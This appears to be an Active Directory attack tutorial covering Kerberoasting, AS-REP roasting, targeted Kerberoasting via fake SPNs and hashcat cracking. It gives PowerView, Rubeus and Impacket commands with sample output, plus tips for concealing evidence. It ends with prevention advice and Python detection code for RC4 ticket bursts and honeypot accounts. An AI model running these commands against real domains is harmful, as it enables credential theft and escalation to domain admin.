1. How Kerberos Authentication Works (Attack-Oriented)

Understanding what you're attacking makes the exploit make sense. Kerberos uses a ticket system to authenticate users to services without transmitting passwords over the network.

  1. AS-REQ / AS-REP (Authentication): The client sends a request to the DC's Authentication Service. The DC verifies pre-authentication (a timestamp encrypted with the user's password hash) and returns a TGT (Ticket Granting Ticket) encrypted with the krbtgt account's hash.
  2. TGS-REQ / TGS-REP (Service Ticket Request): The client presents its TGT and requests a TGS (Service Ticket) for a specific service (identified by its SPN). The DC returns a TGS encrypted with the service account's password hash.
  3. AP-REQ (Service Authentication): The client presents the TGS to the service. The service decrypts it with its own password hash and grants access.

The Kerberoasting insight: Any authenticated domain user can request a TGS for any service in the domain — no special permissions required. The TGS is encrypted with the service account's hash. You take it offline and crack it. The DC logs the TGS request but sees nothing unusual — it's a legitimate operation.

2. Kerberoasting — Cracking Service Account Passwords

2.1 Finding Kerberoastable Accounts

Any user account with a Service Principal Name (SPN) set is Kerberoastable. SPNs identify services (SQL Server, IIS, Exchange, etc.) and are set on the service account that runs them. Machine accounts also have SPNs but use randomly generated, very long passwords — not worth cracking. Focus on user accounts with SPNs.

# Find all user accounts with SPNs set (Kerberoastable)
PS C:\AD\Tools> Get-DomainUser -SPN | select samaccountname, serviceprincipalname

# Example output:
samaccountname    serviceprincipalname
--------------    --------------------
masaaki_mssql     MSSQLSvc/masaaki-mssql.masaaki-corp.local:1433
masaaki_iis       HTTP/masaaki-web01.masaaki-corp.local
stephane_svc      MSSQLSvc/masaaki-mssql.masaaki-corp.local:1434

# Using the native AD module
PS C:\AD\Tools> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | select Name, ServicePrincipalName

# Prioritise: check if any Kerberoastable account is in a privileged group
PS C:\AD\Tools> Get-DomainUser -SPN | ForEach-Object { $u = $_.samaccountname; Get-DomainGroup -MemberIdentity $u | select @{n='user';e={$u}}, name }

2.2 Requesting TGS Tickets with PowerView

# Request TGS and get the hash in crackable format
PS C:\AD\Tools> Get-DomainSPNTicket -SPN "MSSQLSvc/masaaki-mssql.masaaki-corp.local:1433" | fl

# Get ALL Kerberoastable tickets in one shot
PS C:\AD\Tools> Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat | Out-File kerberoast-hashes.txt

# Hash format (RC4/NTLM encryption — type 23):
$krb5tgs$23$*masaaki_mssql$MASAAKI-CORP.LOCAL$MSSQLSvc/masaaki-mssql.masaaki-corp.local:1433*$A3F2B1...

2.3 Kerberoasting with Rubeus

Rubeus is a C# Kerberos toolkit that requests tickets natively without relying on PowerShell or .NET reflection. It's harder to detect and supports AES tickets (type 18) as well as the older RC4 (type 23).

# Kerberoast all accounts and output hashes directly
C:\AD\Tools> .\Rubeus.exe kerberoast /outfile:kerberoast.txt

# Kerberoast a specific user
C:\AD\Tools> .\Rubeus.exe kerberoast /user:masaaki_mssql /outfile:masaaki_mssql.txt

# Force RC4 encryption (easier to crack than AES-256)
C:\AD\Tools> .\Rubeus.exe kerberoast /rc4opsec /outfile:kerberoast-rc4.txt

# Statistics only — see how many accounts are vulnerable without requesting tickets
C:\AD\Tools> .\Rubeus.exe kerberoast /stats

RC4 vs AES: When you request a TGS, Windows will use RC4 encryption by default if the account supports it (most do). RC4 tickets (type 23) crack significantly faster than AES-256 (type 18). Rubeus /rc4opsec specifically requests RC4 — use this for cracking speed.

3. AS-REP Roasting — No Pre-Auth Accounts

Kerberos pre-authentication is the mechanism that proves you know the password before the DC sends you anything useful: the client encrypts the current timestamp with its password hash and sends it in the AS-REQ. The DC decrypts it and verifies the timestamp.

If DONT_REQ_PREAUTH is set on an account, pre-authentication is skipped entirely. An attacker can send an AS-REQ for that account without knowing the password and the DC returns an AS-REP containing data encrypted with the account's password hash — ready to crack offline.

3.1 Finding AS-REP Roastable Accounts

# Find accounts with DONT_REQ_PREAUTH set using PowerView
PS C:\AD\Tools> Get-DomainUser -UACFilter DONT_REQ_PREAUTH | select samaccountname, userprincipalname

# Using the AD module
PS C:\AD\Tools> Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth | select Name

# Example output:
samaccountname
--------------
masaaki_legacy
stephane_test

3.2 Extracting AS-REP Hashes with Rubeus

# AS-REP roast all vulnerable accounts
C:\AD\Tools> .\Rubeus.exe asreproast /outfile:asrep-hashes.txt

# AS-REP roast a specific user
C:\AD\Tools> .\Rubeus.exe asreproast /user:masaaki_legacy /outfile:masaaki_legacy.txt

# Hash format (type 18 — krb5asrep):
$krb5asrep$masaaki_legacy@MASAAKI-CORP.LOCAL:B3A2C1D4E5F6...

3.3 AS-REP Roasting Without Credentials (Unauthenticated)

AS-REP Roasting is unique: if you know the username, you don't even need a valid domain account. This makes it viable from outside the domain — during external assessments or before you've compromised any credentials.

# From Linux — no domain credentials needed, just a valid username
python3 GetNPUsers.py masaaki-corp.local/masaaki_legacy -no-pass -dc-ip 192.168.1.10

# Test a list of usernames
python3 GetNPUsers.py masaaki-corp.local/ -usersfile usernames.txt -no-pass -dc-ip 192.168.1.10 -format hashcat

# Using Rubeus from Windows (provide DC IP instead of relying on DNS)
C:\AD\Tools> .\Rubeus.exe asreproast /domain:masaaki-corp.local /dc:192.168.1.10 /outfile:asrep.txt

4. Targeted Kerberoasting — Creating the Vulnerability

You don't need to find a pre-existing service account with an SPN. If you have GenericWrite or GenericAll on any user account (found in Blog 1 via ACL enumeration), you can set a fake SPN on that account, making it instantly Kerberoastable — even if it's a Domain Admin account.

# Scenario: masaaki has GenericWrite on stephane (a DA)
# Step 1: Set a fake SPN on stephane
PS C:\AD\Tools> Set-DomainObject -Identity stephane -Set @{serviceprincipalname='fake/masaaki-dc01'} -Verbose

# Step 2: Request TGS for the fake SPN
PS C:\AD\Tools> Get-DomainSPNTicket -SPN "fake/masaaki-dc01" -OutputFormat Hashcat

# Step 3: Crack offline
# Step 4: CLEAN UP — remove the fake SPN
PS C:\AD\Tools> Set-DomainObject -Identity stephane -Clear serviceprincipalname -Verbose

This is extremely powerful: If a DA account has a weak password, you can escalate directly to Domain Admin through targeted Kerberoasting — no need to find a service account. Always clean up the SPN to avoid leaving evidence and breaking the account.

5. Offline Cracking with Hashcat

Both Kerberoasting and AS-REP Roasting produce hashes you crack offline — no further interaction with the DC needed. Speed depends entirely on your GPU and the wordlist quality.

# Kerberoasting hash (type 23 — RC4)
hashcat -m 13100 kerberoast-hashes.txt /usr/share/wordlists/rockyou.txt

# Kerberoasting hash, AES tickets: mode 19600 (AES-128, etype 17) or mode 19700 (AES-256, etype 18)
hashcat -m 19700 kerberoast-hashes.txt /usr/share/wordlists/rockyou.txt

# AS-REP Roasting hash (type 18)
hashcat -m 18200 asrep-hashes.txt /usr/share/wordlists/rockyou.txt

# Add rules for better coverage (mutates wordlist — catches Password1!, P@ssw0rd, etc.)
hashcat -m 13100 kerberoast-hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# Use a targeted corporate wordlist (company name, year, city)
hashcat -m 13100 kerberoast-hashes.txt corporate-wordlist.txt -r /usr/share/hashcat/rules/d3ad0ne.rule --force

# Check cracked passwords
hashcat -m 13100 kerberoast-hashes.txt --show

Wordlist strategy: Service accounts often have predictable passwords set by admins: ServiceName2024!, Masaaki@2024, Summer2025!. Build a custom wordlist from the organisation's name, year, city and common patterns — this outperforms rockyou for enterprise service accounts.

6. Prevention & Detection

Use Strong Service Account Passwords (25+ chars)

A 25+ character random password makes Kerberoasting hashes computationally infeasible to crack. Use Group Managed Service Accounts (gMSA) — passwords are 120 characters, randomly generated, auto-rotated by AD.

Audit and Remove Unnecessary SPNs

Run Get-DomainUser -SPN quarterly. Remove SPNs from user accounts that no longer run services. Every SPN on a user account is a potential crack target.

Disable DONT_REQ_PREAUTH

Review all accounts with this flag (DONT_REQ_PREAUTH) and remove it unless absolutely required by a legacy application. It was historically needed for older non-Windows Kerberos clients.

Monitor TGS Requests

Alert on event 4769 (Kerberos Service Ticket Requested) where Ticket Encryption Type is 0x17 (RC4). Legitimate environments use AES. A burst of RC4 TGS requests from a single account is a Kerberoasting IOC.

Enforce AES Encryption

Set msDS-SupportedEncryptionTypes to only allow AES-128 and AES-256 on service accounts. This forces AES tickets, which are slower to crack. Combined with long passwords, this makes Kerberoasting impractical.
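As an added example (not from the original post), the following Python decodes the msDS-SupportedEncryptionTypes bitmask and reports which accounts in a constructed export still permit RC4 or DES; the account names and attribute values are made up, and the state labels are this example's own.

```python
# Bits of msDS-SupportedEncryptionTypes (MS-KILE / MS-ADTS); sample data below is constructed.
DES_CBC_CRC, DES_CBC_MD5, RC4_HMAC, AES128_CTS, AES256_CTS = 0x1, 0x2, 0x4, 0x8, 0x10
AES_ONLY = AES128_CTS | AES256_CTS   # 0x18: the value the control above calls for
NAMES = {DES_CBC_CRC: "DES-CBC-CRC", DES_CBC_MD5: "DES-CBC-MD5", RC4_HMAC: "RC4-HMAC",
         AES128_CTS: "AES128-CTS-HMAC-SHA1-96", AES256_CTS: "AES256-CTS-HMAC-SHA1-96"}

# Constructed export: samaccountname -> attribute value (None = attribute not set)
SAMPLE_ACCOUNTS = {"masaaki_mssql": 0x1c, "masaaki_iis": None,
                   "stephane_svc": 0x18, "svc_old": 0x7}

def decode(value):
    """Names of the etypes an account advertises, in bit order."""
    return [] if value is None else [n for bit, n in NAMES.items() if value & bit]

def classify(value):
    """'aes-only' is the target state; the others leave RC4/DES tickets obtainable."""
    if value is None:
        return "unset"          # not explicitly restricted; review it, do not assume AES
    if value & (DES_CBC_CRC | DES_CBC_MD5):
        return "allows-des"
    if value & RC4_HMAC:
        return "allows-rc4"
    if value & AES_ONLY:        # DES and RC4 bits already excluded above
        return "aes-only"
    return "no-usable-etype"

def audit(accounts):
    """Map each account to (state, advertised etypes) so non-AES ones can be fixed."""
    return {name: (classify(v), decode(v)) for name, v in accounts.items()}
```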

Honeypot Kerberoastable Account

Create a fake service account with an SPN and a very complex password. Monitor event 4769 for TGS requests against this account. Any hit is an attacker — alert immediately.
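The two log-based controls above (RC4 bursts in event 4769 and any request for the honeypot account) as detection logic over a constructed 4769 export, added here and not part of the original post; the requester names, IP addresses, the decoy account name svc_honeypot, the threshold and the window are assumptions.

```python
import csv
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17                       # etype 23 as logged in 4769 (not the msDS-SupportedEncryptionTypes bit)
HONEYPOT_ACCOUNTS = {"svc_honeypot"}  # assumed decoy account; appears as ServiceName in 4769
BURST_THRESHOLD = 5                   # distinct RC4 service tickets per requester inside WINDOW
WINDOW = timedelta(minutes=10)

# Constructed sample export: time,TargetUserName,ServiceName,TicketEncryptionType,IpAddress
SAMPLE_4769 = """\
2025-01-10T09:00:01,alice@MASAAKI-CORP.LOCAL,masaaki_mssql,0x12,192.168.1.50
2025-01-10T09:01:12,legacy_app@MASAAKI-CORP.LOCAL,masaaki_iis,0x17,192.168.1.60
2025-01-10T09:05:00,jdoe@MASAAKI-CORP.LOCAL,masaaki_mssql,0x17,192.168.1.77
2025-01-10T09:05:01,jdoe@MASAAKI-CORP.LOCAL,masaaki_iis,0x17,192.168.1.77
2025-01-10T09:05:01,jdoe@MASAAKI-CORP.LOCAL,stephane_svc,0x17,192.168.1.77
2025-01-10T09:05:02,jdoe@MASAAKI-CORP.LOCAL,svc_backup,0x17,192.168.1.77
2025-01-10T09:05:02,jdoe@MASAAKI-CORP.LOCAL,svc_honeypot,0x17,192.168.1.77
"""
FIELDS = ["time", "user", "service", "etype", "ip"]

def parse_4769(text):
    """Turn the export into dicts; the event records the etype as a hex string."""
    rows = []
    for r in csv.DictReader(text.splitlines(), fieldnames=FIELDS):
        r["time"] = datetime.fromisoformat(r["time"])
        r["etype"] = int(r["etype"], 16)
        rows.append(r)
    return rows

def honeypot_hits(events):
    """Any ticket request for the decoy account is an alert, whatever the etype."""
    return [(e["user"], e["ip"]) for e in events if e["service"] in HONEYPOT_ACCOUNTS]

def rc4_bursts(events):
    """Requesters that pulled >= BURST_THRESHOLD distinct RC4 tickets inside WINDOW."""
    by_user = defaultdict(list)
    for e in events:
        if e["etype"] == RC4_HMAC:
            by_user[e["user"]].append((e["time"], e["service"]))
    flagged = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):      # sliding window from each request
            distinct = {svc for t, svc in reqs[i:] if t - start <= WINDOW}
            if len(distinct) >= BURST_THRESHOLD:
                flagged[user] = len(distinct)       # one alert per requester
                break
    return flagged
```

A single RC4 ticket from legacy_app is not flagged, which keeps the rule quiet for the odd legacy client while still catching the one-account sweep.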